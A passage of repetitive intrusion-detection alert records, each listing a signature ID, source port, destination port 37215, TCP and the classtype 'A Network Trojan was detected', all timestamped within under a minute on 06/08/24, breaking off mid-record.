          SID:2829579
          Source Port:49294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016875
          SID:2829579
          Source Port:38778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893576
          SID:2835222
          Source Port:56112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035077
          SID:2829579
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172824
          SID:2835222
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446603
          SID:2835222
          Source Port:54554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512954
          SID:2829579
          Source Port:48500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175831
          SID:2829579
          Source Port:60466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351852
          SID:2835222
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.054856
          SID:2829579
          Source Port:49054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179666
          SID:2835222
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401837
          SID:2829579
          Source Port:46350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894941
          SID:2829579
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159225
          SID:2835222
          Source Port:57714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466411
          SID:2829579
          Source Port:43628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079057
          SID:2829579
          Source Port:35738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041414
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745637
          SID:2829579
          Source Port:49786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356202
          SID:2829579
          Source Port:44834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406068
          SID:2835222
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468688
          SID:2829579
          Source Port:45726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782378
          SID:2829579
          Source Port:60352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160300
          SID:2829579
          Source Port:42382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738457
          SID:2835222
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745788
          SID:2835222
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044326
          SID:2829579
          Source Port:58472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669716
          SID:2829579
          Source Port:58960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044044
          SID:2829579
          Source Port:45896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153728
          SID:2835222
          Source Port:44196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.411575
          SID:2835222
          Source Port:42138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511459
          SID:2835222
          Source Port:34248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272692
          SID:2835222
          Source Port:57880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352217
          SID:2829579
          Source Port:33578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159163
          SID:2829579
          Source Port:35546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108273
          SID:2829579
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297267
          SID:2835222
          Source Port:49308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820623
          SID:2835222
          Source Port:49430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508488
          SID:2835222
          Source Port:53754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447092
          SID:2829579
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510292
          SID:2835222
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114541
          SID:2835222
          Source Port:42978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818799
          SID:2829579
          Source Port:36178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172747
          SID:2835222
          Source Port:40074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888266
          SID:2829579
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266450
          SID:2829579
          Source Port:57322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857595
          SID:2835222
          Source Port:34596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733457
          SID:2835222
          Source Port:58650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857084
          SID:2829579
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673583
          SID:2829579
          Source Port:58206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739970
          SID:2829579
          Source Port:41874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.793965
          SID:2835222
          Source Port:59098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017818
          SID:2835222
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552040
          SID:2829579
          Source Port:49988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396978
          SID:2835222
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160418
          SID:2829579
          Source Port:39836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733987
          SID:2835222
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015956
          SID:2829579
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156023
          SID:2835222
          Source Port:53982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159116
          SID:2829579
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842828
          SID:2835222
          Source Port:55742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351021
          SID:2835222
          Source Port:55290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787298
          SID:2835222
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800251
          SID:2835222
          Source Port:55494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599760
          SID:2829579
          Source Port:59150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262331
          SID:2829579
          Source Port:51080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239889
          SID:2829579
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513660
          SID:2835222
          Source Port:55952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158108
          SID:2835222
          Source Port:32784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796181
          SID:2835222
          Source Port:33728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081807
          SID:2835222
          Source Port:38408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892499
          SID:2829579
          Source Port:40930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740299
          SID:2835222
          Source Port:48138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861931
          SID:2835222
          Source Port:52934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780723
          SID:2835222
          Source Port:59436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410173
          SID:2829579
          Source Port:51676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041378
          SID:2829579
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894501
          SID:2829579
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242790
          SID:2829579
          Source Port:41428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463159
          SID:2835222
          Source Port:53628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306686
          SID:2829579
          Source Port:53156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551688
          SID:2835222
          Source Port:56770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731388
          SID:2829579
          Source Port:37302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510159
          SID:2829579
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730203
          SID:2835222
          Source Port:50854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827477
          SID:2829579
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043482
          SID:2829579
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233538
          SID:2835222
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356237
          SID:2829579
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132864
          SID:2829579
          Source Port:36632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067637
          SID:2835222
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302446
          SID:2829579
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302610
          SID:2835222
          Source Port:46700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811724
          SID:2829579
          Source Port:36492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705742
          SID:2835222
          Source Port:40760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450024
          SID:2829579
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113706
          SID:2835222
          Source Port:35668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442317
          SID:2835222
          Source Port:34036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798913
          SID:2835222
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108033
          SID:2835222
          Source Port:58974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745496
          SID:2829579
          Source Port:37654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545694
          SID:2829579
          Source Port:41632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356933
          SID:2829579
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269366
          SID:2829579
          Source Port:55696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742466
          SID:2829579
          Source Port:58538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863172
          SID:2829579
          Source Port:56832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894585
          SID:2835222
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707898
          SID:2835222
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128079
          SID:2835222
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350964
          SID:2829579
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668606
          SID:2829579
          Source Port:37790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788493
          SID:2829579
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829616
          SID:2835222
          Source Port:52270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792040
          SID:2835222
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177687
          SID:2829579
          Source Port:42432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858030
          SID:2835222
          Source Port:33596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169479
          SID:2835222
          Source Port:55234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706051
          SID:2835222
          Source Port:47162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467067
          SID:2829579
          Source Port:33996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005550
          SID:2835222
          Source Port:39018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264202
          SID:2835222
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738381
          SID:2835222
          Source Port:42452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355294
          SID:2829579
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549288
          SID:2835222
          Source Port:40852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793516
          SID:2835222
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264915
          SID:2835222
          Source Port:60784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595252
          SID:2835222
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822927
          SID:2829579
          Source Port:45094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511687
          SID:2835222
          Source Port:35974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798046
          SID:2829579
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151137
          SID:2829579
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733359
          SID:2835222
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601626
          SID:2835222
          Source Port:49806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159669
          SID:2829579
          Source Port:60536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130196
          SID:2829579
          Source Port:35260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468766
          SID:2829579
          Source Port:47018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739779
          SID:2835222
          Source Port:38224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173870
          SID:2835222
          Source Port:50316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157029
          SID:2835222
          Source Port:48122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708558
          SID:2829579
          Source Port:41818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180924
          SID:2829579
          Source Port:41514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788431
          SID:2829579
          Source Port:37604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257676
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276108
          SID:2835222
          Source Port:54758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158897
          SID:2835222
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2835222
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892036
          SID:2835222
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162776
          SID:2829579
          Source Port:41940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897684
          SID:2835222
          Source Port:33628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239712
          SID:2829579
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731967
          SID:2829579
          Source Port:35046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448983
          SID:2829579
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174761
          SID:2829579
          Source Port:35102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891744
          SID:2829579
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897659
          SID:2835222
          Source Port:42834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268952
          SID:2835222
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179157
          SID:2829579
          Source Port:38082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782408
          SID:2829579
          Source Port:48538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262181
          SID:2829579
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133117
          SID:2829579
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602656
          SID:2829579
          Source Port:56754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.458040
          SID:2835222
          Source Port:35038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732601
          SID:2835222
          Source Port:54574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039151
          SID:2835222
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461219
          SID:2829579
          Source Port:32798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446185
          SID:2835222
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274292
          SID:2835222
          Source Port:50986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884189
          SID:2829579
          Source Port:56406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038043
          SID:2835222
          Source Port:53906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.117852
          SID:2835222
          Source Port:46318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671043
          SID:2829579
          Source Port:34840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063054
          SID:2829579
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741071
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729363
          SID:2829579
          Source Port:52044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.798388
          SID:2829579
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042089
          SID:2829579
          Source Port:35882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402510
          SID:2829579
          Source Port:44648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353425
          SID:2835222
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444716
          SID:2829579
          Source Port:47602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275293
          SID:2835222
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352973
          SID:2835222
          Source Port:45618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861707
          SID:2835222
          Source Port:33590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782660
          SID:2835222
          Source Port:46810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598616
          SID:2829579
          Source Port:35758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352927
          SID:2829579
          Source Port:50016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466442
          SID:2835222
          Source Port:51460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667118
          SID:2835222
          Source Port:40556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912595
          SID:2829579
          Source Port:33992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601757
          SID:2835222
          Source Port:58798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132705
          SID:2835222
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130184
          SID:2835222
          Source Port:48902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842407
          SID:2835222
          Source Port:46630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741692
          SID:2829579
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783912
          SID:2829579
          Source Port:43888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466809
          SID:2835222
          Source Port:33514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158156
          SID:2829579
          Source Port:38328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861260
          SID:2835222
          Source Port:55036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894792
          SID:2835222
          Source Port:35612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670228
          SID:2835222
          Source Port:43958
          Destination Port:37215
